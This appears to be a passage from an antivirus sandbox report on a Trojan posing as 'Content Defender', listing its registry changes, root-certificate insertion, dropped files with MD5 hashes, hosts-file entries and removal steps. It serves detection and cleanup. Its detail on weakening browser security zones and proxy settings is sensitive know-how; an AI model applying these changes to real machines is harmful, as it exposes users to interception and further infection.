[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\ESENT\Process\ec805d4411149c36848938d5e82f6aff\DEBUG]
"Trace Level"

The process verclsid.exe:1272 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5D 42 1D B0 AB DB 5A 91 2D F8 C4 B6 8E 62 F7 6B"

The process cd.exe:1200 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 7D 28 FA C9 65 38 B4 84 DB 05 B7 59 BD 41 AB"

[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0]
"(Default)" = "ContentDefenderLib"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\Version]
"(Default)" = "1.0"

[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"

[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\0\win32]
"(Default)" = "%Program Files%\Content Defender\cd.exe"

[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService" = "cd"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Content Defender"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\TypeLib]
"(Default)" = "{CCA2A357-CCB4-41C9-B6F5-4F202B8CDC82}"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"(Default)" = "%Program Files%\Content Defender\cd.exe"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}]
"(Default)" = "IDefenderControl"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}\LocalServer32]
"ServerExecutable" = "%Program Files%\Content Defender\cd.exe"

[HKCR\Interface\{B28F9114-243E-4046-B173-11825352D18A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{9B7395C3-28B5-445E-AA7D-539B63514CAB}]
"(Default)" = "DefenderControl Class"

The Trojan deletes the following value(s) in system registry:

[HKCR\AppID\{3E0DB45B-9FCC-4064-B48C-080BD03A99A4}]
"LocalService"

The process cd.exe:532 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\LocalService\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\99602BB894425BD59B9291BC32B4657BC8C362A8]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 99 60 2B B8"

[HKLM\SOFTWARE\ContentDefender]
"Installed" = "1"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\ContentDefender]
"ff" = "yes"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D AD 8E 73 10 B4 E0 DC A3 90 E9 98 B1 A5 44 15"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"99602BB894425BD59B9291BC32B4657BC8C362A8"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process ASIns.exe:388 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 29 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"pname" = "AS"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 CB 3D CA 95 AB 6C B4 C5 4C 6E 84 71 D8 EA 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies]
"(Default)" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5	File path
3c85a37a54db8567fb49454f1e843995	c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\tdi__amd64.sys
14a2aef6aff5a438acace9c1d1b09ab8	c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\tdi__i386.sys
2662a31ffc8565492a0492ae90ac52d7	c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys
39d01796ee492a83b113c0b4e42029df	c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys
bb403a2ec69885a71c23b54a4681c6ab	c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys
09fdb4dc6d10d90e1022605271b410b6	c:\Documents and Settings\All Users\Application Data\ContentDefender\driver\wfp_windows8_i386.sys
c9a57b85b5e3525eb12a5f8842ec31af	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ContentDefenderControl.exe
83a06ef0da07004ff083e4f8d883f5d0	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll
0cf3fffe01b3e10170252060e384992d	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\cd.exe
f2b8f4dd1537bed0eab1af1a685385a3	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\condefclean.exe
1f4aa52cda820a6673d51a29625ab27c	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\import_root_cert.exe
99d21c17565ec8a20fcdc90b6b842bf7	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\libeay32.dll
5888b9054f889d4f94091f68049eac82	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nfregdrv.exe
a6c4a86a016cf62b949546a4629072b0	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\certutil.exe
c2bd7f2bda94f7c4f2c4cee0413c38a3	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\mozcrt19.dll
61a1f11a8d031c525636d67bf6378e16	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll
a5a8f547c982af1da2a34aa717b00a0d	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\nss3.dll
036abc7576e02be68480c57a7dc60010	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\plc4.dll
6117994e7e30bf20ad42f81cf486f5e7	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\plds4.dll
044213f6a4c6ced0e8d935587657066a	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\smime3.dll
47b4d529901fdcccc9f46d8c64ebda6d	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll
6b9dfbfcc91ba1dcb86ea1f8d3ee259b	c:\Documents and Settings\All Users\Application Data\ContentDefender\win32\ssleay32.dll
d1c64eb593b7c75caa1f720b20fcbfca	c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe
f228f6dba41ee23f4a4fa6a94720126e	c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll
7752b437c2f8ab242d206f4fff7d898d	c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\cd.exe
ab32d5d764d252be947747807cf19b47	c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\condefclean.exe
9072f540831eb094de5826a73ca899da	c:\Documents and Settings\All Users\Application Data\ContentDefender\x64\import_root_cert.exe
3464bc076d7d6fcd19fd50ebd19f5741	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\31F03376-17B9-4185-A6B6-3F7E5BFAF610\condefsetup (19).exe
3c85a37a54db8567fb49454f1e843995	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys
14a2aef6aff5a438acace9c1d1b09ab8	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__i386.sys
2662a31ffc8565492a0492ae90ac52d7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_amd64.sys
39d01796ee492a83b113c0b4e42029df	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys
bb403a2ec69885a71c23b54a4681c6ab	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys
09fdb4dc6d10d90e1022605271b410b6	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_i386.sys
c9a57b85b5e3525eb12a5f8842ec31af	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe
83a06ef0da07004ff083e4f8d883f5d0	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderPS.dll
0cf3fffe01b3e10170252060e384992d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\cd.exe
f2b8f4dd1537bed0eab1af1a685385a3	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe
1f4aa52cda820a6673d51a29625ab27c	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe
99d21c17565ec8a20fcdc90b6b842bf7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll
5888b9054f889d4f94091f68049eac82	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nfregdrv.exe
a6c4a86a016cf62b949546a4629072b0	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\certutil.exe
c2bd7f2bda94f7c4f2c4cee0413c38a3	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll
61a1f11a8d031c525636d67bf6378e16	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nspr4.dll
a5a8f547c982af1da2a34aa717b00a0d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\nss3.dll
036abc7576e02be68480c57a7dc60010	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll
6117994e7e30bf20ad42f81cf486f5e7	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll
044213f6a4c6ced0e8d935587657066a	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\smime3.dll
47b4d529901fdcccc9f46d8c64ebda6d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\softokn3.dll
6b9dfbfcc91ba1dcb86ea1f8d3ee259b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll
d1c64eb593b7c75caa1f720b20fcbfca	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe
f228f6dba41ee23f4a4fa6a94720126e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll
7752b437c2f8ab242d206f4fff7d898d	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\cd.exe
ab32d5d764d252be947747807cf19b47	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe
9072f540831eb094de5826a73ca899da	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe
bc1f19367a5e597ebdf2f1b357ab9f8e	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\libeay32.dll
012d3afc8d4c07bc639970aa3d16bd75	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe
7dc4abffeb842ced0a4b8c340f85cec3	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\certutil.exe
7b2aedbd790196a04d37eb9ce3e79858	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll
2875e121662118df6711ccacc59a5e91	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll
78bffb8f373269b174e6b125b556009b	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nss3.dll
6d6487a060f245818c5ffdf5c92c3326	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll
371182686c722038a05c6df300dbae37	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll
ffacc094cc51ec7ea40e04963050859f	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\smime3.dll
007473ce8c0e03b7d851d1620af113f8	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll
73eaf0ffe4f1e3d66a4dccbfb00579a4	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ssleay32.dll
14a2aef6aff5a438acace9c1d1b09ab8	c:\WINDOWS\system32\drivers\condef.sys

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 841 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1	down.baidu2016.com
127.0.0.1	123.sogou.com
127.0.0.1	www.czzsyzgm.com

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
condefsetup (19).exe:1984
verclsid.exe:1272
cd.exe:1200
cd.exe:532
ASIns.exe:388
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nfregdrv.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\condefclean.exe (7716 bytes)
%Program Files%\Content Defender\nfregdrv.exe (601 bytes)
%Program Files%\Content Defender\nss\smime3.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\ssleay32.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\smime3.dll (7716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows7_i386.sys (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\softokn3.dll (4061 bytes)
%Program Files%\Content Defender\ContentDefenderPS.dll (13 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\certutil.exe (6324 bytes)
%Program Files%\Content Defender\libeay32.dll (9098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\nspr4.dll (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderControl.exe (10588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\import_root_cert.exe (941 bytes)
%Program Files%\Content Defender\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\wfp_windows8_amd64.sys (58 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_i386.sys (3516 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\cd.exe (6341 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plds4.dll (17 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\condefclean.exe (7716 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\import_root_cert.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plds4.dll (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ssleay32.dll (4061 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\ContentDefender.zip (37274 bytes)
%Program Files%\Content Defender\nss\softokn3.dll (2105 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\plds4.dll (580 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\driver\tdi__amd64.sys (61 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\softokn3.dll (25100 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\ContentDefenderPS.dll (6116 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\plc4.dll (20 bytes)
%System%\drivers\condef.sys (56 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\condefclean.exe (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\condefclean.exe (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\tdi__i386.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\smime3.dll (7716 bytes)
%Program Files%\Content Defender\nss\mozcrt19.dll (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderPS.dll (941 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\libeay32.dll (86270 bytes)
%Program Files%\Content Defender\nss\nspr4.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\libeay32.dll (11493 bytes)
%Program Files%\Content Defender\import_root_cert.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows7_amd64.sys (4012 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\ContentDefenderPS.dll (484 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nfregdrv.exe (9476 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\nss\nspr4.dll (11620 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\x64\nss\plc4.dll (20 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\driver\wfp_windows8_amd64.sys (4356 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nfregdrv.exe (9196 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\win32\import_root_cert.exe (6724 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\nss\mozcrt19.dll (7581 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Temporary Directory 1 for ContentDefender.zip\win32\ContentDefenderControl.exe (1821 bytes)
%Documents and Settings%\All Users\Application Data\ContentDefender\x64\nss\nss3.dll (24908 bytes)
